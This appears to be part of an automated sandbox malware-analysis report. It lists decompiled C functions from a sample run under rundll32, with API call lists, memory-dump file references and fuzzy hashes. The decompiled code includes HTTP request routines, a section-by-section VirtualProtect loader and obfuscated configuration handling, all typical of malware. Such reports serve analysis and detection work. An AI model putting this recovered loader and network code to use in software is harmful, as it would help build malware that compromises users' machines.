				if(_a4 != 0 && E04B95448(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04B97C28(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                0x04b963f7
                0x04b96404
                0x04b96406
                0x04b96469
                0x00000000
                0x04b96469
                0x04b9641e
                0x04b96425
                0x04b96431
                0x04b96436
                0x04b9644c
                0x04b9645c
                0x00000000
                0x04b9644e
                0x04b9644e
                0x04b96455
                0x04b96462
                0x04b96462
                0x04b96462
                0x04b96455
                0x04b9644c
                0x04b96467
                0x00000000
                0x00000000
                0x04b9646d

                APIs
                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04B946E0,?,?,746981D0,00000000), ref: 04B96431
                • ResetEvent.KERNEL32(?), ref: 04B96436
                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04B96443
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04B96E43,00000000,?,?), ref: 04B9644E
                • GetLastError.KERNEL32(?,?,00000102,04B946E0,?,?,746981D0,00000000), ref: 04B96469
                  • Part of subcall function 04B95448: lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,04B96416,?,?,?,?,00000102,04B946E0,?,?,746981D0), ref: 04B95454
                  • Part of subcall function 04B95448: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04B96416,?,?,?,?,00000102,04B946E0,?), ref: 04B954B2
                  • Part of subcall function 04B95448: lstrcpy.KERNEL32(00000000,00000000), ref: 04B954C2
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04B96E43,00000000,?), ref: 04B9645C
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 3739416942-0
                • Opcode ID: a9953e2a55e316956eaf4fb7627cc3555fe93cbb86ab185a488254f5be6e0745
                • Instruction ID: f3a0224d2fe4c3a4744a309d99b34f64aec87065dbb2d4a361d0a0ec9eadd36b
                • Opcode Fuzzy Hash: a9953e2a55e316956eaf4fb7627cc3555fe93cbb86ab185a488254f5be6e0745
                • Instruction Fuzzy Hash: C101AD31100201AADF316FB9DD44F1B77E8FF54325F108A7AF461922E0DA20FC10DA61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B97838 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 50%
                			E04B97838(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x4b9a3cc; // 0x5109600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4b9a3cc; // 0x5109600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x4b9a030) {
					HeapFree( *0x4b9a2d8, 0, _t8);
				}
				_t9 = E04B91653(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x4b9a3cc; // 0x5109600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                0x04b97838
                0x04b97838
                0x04b97841
                0x04b97851
                0x04b97851
                0x04b97856
                0x04b9785b
                0x00000000
                0x00000000
                0x04b9784b
                0x04b9784b
                0x04b9785d
                0x04b97861
                0x04b97873
                0x04b97873
                0x04b9787e
                0x04b97883
                0x04b97886
                0x04b9788b
                0x04b9788f
                0x04b97895

                APIs
                • RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B97841
                • Sleep.KERNEL32(0000000A), ref: 04B9784B
                • HeapFree.KERNEL32(00000000,00000000), ref: 04B97873
                • RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B9788F
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Uet
                • API String ID: 58946197-2766386878
                • Opcode ID: 1331a79665f9246b04d60d20c2ee2881f096f7dddc1d7c874e1072ab5c3e2d2a
                • Instruction ID: 7138d2e852ac970e55947d15a0b3e9b4b935a343d59d876e84f91d08b81252fe
                • Opcode Fuzzy Hash: 1331a79665f9246b04d60d20c2ee2881f096f7dddc1d7c874e1072ab5c3e2d2a
                • Instruction Fuzzy Hash: A3F0FE71604282EBEF209F7ADE88B163BF4EB08740B04846AF916D7261CE35EC50DB35
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B9349A Relevance: 7.7, APIs: 5, Instructions: 161memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E04B9349A(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04B973F3();
				if(_t21 != 0) {
					_t60 =  *0x4b9a2fc; // 0x4000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x4b9a2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4b9a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04B96B51( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x4b9a348; // 0x56d5a8
					if( *0x4b9a2fc > 5) {
						_t8 = _t26 + 0x4b9b5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4b9b9ef; // 0x44283a44
						_t27 = _t7;
					}
					E04B9230B(_t27, _t27);
					_t31 = E04B94B7B(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E04B93832();
						 *0x4b9a310 =  *0x4b9a310 ^ 0x81bbe65d;
						 *0x4b9a36c = _t32;
						_t33 = E04B96601(0x60);
						 *0x4b9a3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x4b9a3cc; // 0x5109600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x4b9a3cc; // 0x5109600
							 *_t52 = 0x4b9b827;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x4b9a2d8, 0, 0x43);
							 *0x4b9a368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x4b9a2fc; // 0x4000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x4b9a348; // 0x56d5a8
								_t13 = _t59 + 0x4b9b552; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x4b99290);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04B91F55( ~_v8 &  *0x4b9a310, 0x4b9a00c); // executed
								_t43 = E04B94CAB(0, _t56, _t62, _t64, 0x4b9a00c); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E04B9775E(_t62); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E04B91898(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E04B9367F(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4b9a17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E04B958B9(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}
































                0x04b9349a
                0x04b934a4
                0x04b934a7
                0x04b934aa
                0x04b934ad
                0x04b934b4
                0x04b934b6
                0x04b934c2
                0x04b934c4
                0x04b934c4
                0x04b934cd
                0x04b934d3
                0x04b934d8
                0x04b934f2
                0x04b934fe
                0x04b93500
                0x04b93505
                0x04b9350f
                0x04b9350f
                0x04b93507
                0x04b93507
                0x04b93507
                0x04b93507
                0x04b93516
                0x04b93523
                0x04b9352a
                0x04b9352f
                0x04b9352f
                0x04b93538
                0x04b9353b
                0x04b93561
                0x04b93566
                0x04b93572
                0x04b93577
                0x04b9357c
                0x04b93581
                0x04b93583
                0x04b935af
                0x04b935b1
                0x04b93585
                0x04b93589
                0x04b9358e
                0x04b93593
                0x04b9359a
                0x04b935a0
                0x04b935a5
                0x04b935ab
                0x04b935b2
                0x04b935b4
                0x04b935b6
                0x04b935c5
                0x04b935cb
                0x04b935d0
                0x04b935d2
                0x04b93602
                0x04b93604
                0x04b935d4
                0x04b935d4
                0x04b935da
                0x04b935e7
                0x04b935ed
                0x04b935ed
                0x04b935f5
                0x04b935fe
                0x04b93605
                0x04b93607
                0x04b93609
                0x04b93610
                0x04b9361d
                0x04b93622
                0x04b93627
                0x04b93629
                0x04b9362b
                0x00000000
                0x00000000
                0x04b9362d
                0x04b93632
                0x04b93634
                0x04b9363b
                0x04b9363f
                0x04b93642
                0x04b93657
                0x04b9365b
                0x04b93660
                0x00000000
                0x04b93660
                0x04b93644
                0x04b93646
                0x00000000
                0x00000000
                0x04b93651
                0x04b93653
                0x04b93655
                0x00000000
                0x00000000
                0x00000000
                0x04b93655
                0x04b93638
                0x04b93638
                0x04b93609
                0x04b9353d
                0x04b9353d
                0x04b93542
                0x04b93662
                0x04b93667
                0x04b9366f
                0x04b9366f
                0x00000000
                0x04b93667
                0x04b93548
                0x04b9354b
                0x04b93555
                0x04b9355c
                0x00000000
                0x04b93677
                0x04b93677
                0x04b9367a
                0x04b9367e
                0x04b9367e

                APIs
                  • Part of subcall function 04B973F3: GetModuleHandleA.KERNEL32(4C44544E,00000000,04B934B2,00000001), ref: 04B97402
                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04B9352F
                  • Part of subcall function 04B93832: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 04B93856
                  • Part of subcall function 04B93832: wsprintfA.USER32 ref: 04B938BA
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • memset.NTDLL ref: 04B93589
                • RtlInitializeCriticalSection.NTDLL(051095C0), ref: 04B9359A
                  • Part of subcall function 04B9367F: memset.NTDLL ref: 04B93699
                  • Part of subcall function 04B9367F: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04B936DF
                  • Part of subcall function 04B9367F: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04B936EA
                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04B935C5
                • wsprintfA.USER32 ref: 04B935F5
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
                • String ID:
                • API String ID: 1825273115-0
                • Opcode ID: bbee4f509f342f06bc6aab0ff5ecbc920d68dadc8828934d372cbc28f6623bf8
                • Instruction ID: eb85b2d31187519a4bfd3e2933887f0777a7ed1b13ec843558e1be6f3c218b00
                • Opcode Fuzzy Hash: bbee4f509f342f06bc6aab0ff5ecbc920d68dadc8828934d372cbc28f6623bf8
                • Instruction Fuzzy Hash: 9F51D671A08215ABEF21AFB4DD95F6E37E8EB0D704F1058B6E901D7240EB79BD448B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B96616 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E04B96616(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04B96601(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04B94130(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04B96601((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x4b9a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                0x04b9661d
                0x04b96624
                0x04b96629
                0x04b9662c
                0x04b96633
                0x04b96636
                0x04b96639
                0x04b9663e
                0x04b96643
                0x04b96797
                0x04b96799
                0x04b9679b
                0x04b967a0
                0x04b967a0
                0x04b96649
                0x04b9664c
                0x04b9664f
                0x04b96651
                0x04b96651
                0x04b96655
                0x00000000
                0x00000000
                0x04b96659
                0x04b96685
                0x04b9668a
                0x04b9668c
                0x04b9668c
                0x04b9668f
                0x04b96692
                0x04b96692
                0x04b96694
                0x00000000
                0x04b9665f
                0x04b96661
                0x04b96680
                0x04b96680
                0x04b96697
                0x04b96697
                0x04b96698
                0x04b96698
                0x04b9669b
                0x00000000
                0x00000000
                0x00000000
                0x04b9669b
                0x04b96665
                0x04b966ac
                0x04b966b0
                0x04b9678a
                0x04b9678c
                0x04b9678c
                0x04b9678d
                0x04b96790
                0x00000000
                0x04b96790
                0x04b966b9
                0x04b966ca
                0x04b966ce
                0x04b96786
                0x00000000
                0x04b96786
                0x04b966d4
                0x04b966d7
                0x04b966db
                0x04b966df
                0x04b966e4
                0x04b9677c
                0x04b9677c
                0x00000000
                0x04b96782
                0x04b966ef
                0x04b966f8
                0x04b9670c
                0x04b96713
                0x04b96728
                0x04b9672e
                0x04b96736
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x04b96738
                0x04b96738
                0x04b96738
                0x04b9673f
                0x04b96747
                0x00000000
                0x00000000
                0x04b96749
                0x04b96752
                0x00000000
                0x00000000
                0x00000000
                0x04b96754
                0x04b96756
                0x04b96759
                0x04b96759
                0x04b9675c
                0x04b96760
                0x04b96763
                0x04b96769
                0x04b9676c
                0x04b96773
                0x00000000
                0x04b966ef
                0x04b9666a
                0x04b96672
                0x04b96678
                0x04b9667a
                0x04b9667a
                0x04b9667d
                0x04b9667f
                0x00000000
                0x04b9667f
                0x04b96659
                0x04b9669f
                0x04b966a4
                0x04b966a6
                0x04b966a6
                0x04b966a9
                0x04b966a9
                0x00000000

                APIs
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04B96713
                • lstrcat.KERNEL32(69B25F45,00000020), ref: 04B96728
                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04B9673F
                • lstrlen.KERNEL32(69B25F45), ref: 04B96763
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: 7075c7e3c731ab93d3f378d20d4463a53896d620cd5a42305099c05564b628e3
                • Instruction ID: 4b8f037de60b7b11fc505543d480a6cd6d7472bbb2dec515ecfea28bd501dbaf
                • Opcode Fuzzy Hash: 7075c7e3c731ab93d3f378d20d4463a53896d620cd5a42305099c05564b628e3
                • Instruction Fuzzy Hash: B0517B71A00218EBDF218FA9C5847EDBBF6EF45314F1580AAE815AB211C735BE51CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B94202 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B94202(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04B91000(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4b9a348; // 0x56d5a8
				_t4 = _t24 + 0x4b9be30; // 0x51093d8
				_t5 = _t24 + 0x4b9bdd8; // 0x4f0053
				_t26 = E04B9405E( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4b9a348; // 0x56d5a8
						_t11 = _t32 + 0x4b9be24; // 0x51093cc
						_t48 = _t11;
						_t12 = _t32 + 0x4b9bdd8; // 0x4f0053
						_t52 = E04B917A4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x4b9a348; // 0x56d5a8
							_t13 = _t35 + 0x4b9be6e; // 0x30314549
							_t37 = E04B92F4B(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x4b9a2fc - 6;
								if( *0x4b9a2fc <= 6) {
									_t42 =  *0x4b9a348; // 0x56d5a8
									_t15 = _t42 + 0x4b9bdba; // 0x52384549
									E04B92F4B(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x4b9a348; // 0x56d5a8
							_t17 = _t38 + 0x4b9be68; // 0x5109410
							_t18 = _t38 + 0x4b9be40; // 0x680043
							_t45 = E04B94AA9(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x4b9a2d8, 0, _t52);
						}
					}
					HeapFree( *0x4b9a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04B95D72(_t54);
				}
				return _t45;
			}



















                0x04b94202
                0x04b94212
                0x04b94215
                0x04b9421c
                0x04b9421e
                0x04b9421e
                0x04b94221
                0x04b94226
                0x04b9422d
                0x04b9423a
                0x04b9423f
                0x04b94243
                0x04b94251
                0x04b9425f
                0x04b94263
                0x04b942f4
                0x04b942f4
                0x04b94269
                0x04b94269
                0x04b9426e
                0x04b9426e
                0x04b94275
                0x04b94281
                0x04b94283
                0x04b94285
                0x04b94287
                0x04b9428e
                0x04b94299
                0x04b942a0
                0x04b942a2
                0x04b942a9
                0x04b942ab
                0x04b942b2
                0x04b942bd
                0x04b942bd
                0x04b942a9
                0x04b942c2
                0x04b942c7
                0x04b942ce
                0x04b942ec
                0x04b942ee
                0x04b942ee
                0x04b94285
                0x04b94300
                0x04b94300
                0x04b94302
                0x04b94307
                0x04b94309
                0x04b94309
                0x04b94314

                APIs
                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,051093D8,00000000,?,746AF710,00000000,746AF730), ref: 04B94251
                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05109410,?,00000000,30314549,00000014,004F0053,051093CC), ref: 04B942EE
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04B91939), ref: 04B94300
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Uet
                • API String ID: 3298025750-2766386878
                • Opcode ID: 2c8363352e25b0039b32cf13ce7e31a48444309104dc759b9e88ece49de46a81
                • Instruction ID: db455883284f47af2052fd581a9359b6c6011b40e6983bd47fbc9b67abc0c88c
                • Opcode Fuzzy Hash: 2c8363352e25b0039b32cf13ce7e31a48444309104dc759b9e88ece49de46a81
                • Instruction Fuzzy Hash: 6C31D072A04158BFEF11DBA4DD84E9A3BFCFB08700F1501E6A60097021DA71BE49DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401152 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E00401152(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x4041c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                0x0040115c
                0x00401169
                0x0040116f
                0x0040117b
                0x0040118b
                0x0040118d
                0x00401195
                0x0040122a
                0x00401231
                0x00000000
                0x00000000
                0x00000000
                0x0040119b
                0x0040119b
                0x0040119b
                0x0040119f
                0x00000000
                0x00000000
                0x004011ab
                0x004011af
                0x004011d3
                0x004011d7
                0x004011eb
                0x004011eb
                0x004011f1
                0x00401200
                0x00401204
                0x0040120c
                0x0040120c
                0x00401214
                0x00401217
                0x00401224
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00401224
                0x004011df
                0x004011e3
                0x004011e9
                0x00000000
                0x00000000
                0x00000000
                0x004011e9
                0x004011b7
                0x004011bb
                0x004011c5
                0x004011bd
                0x004011bd
                0x004011bd
                0x00000000
                0x004011bb
                0x00000000

                APIs
                • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040118B
                • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401200
                • GetLastError.KERNEL32 ref: 00401206
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
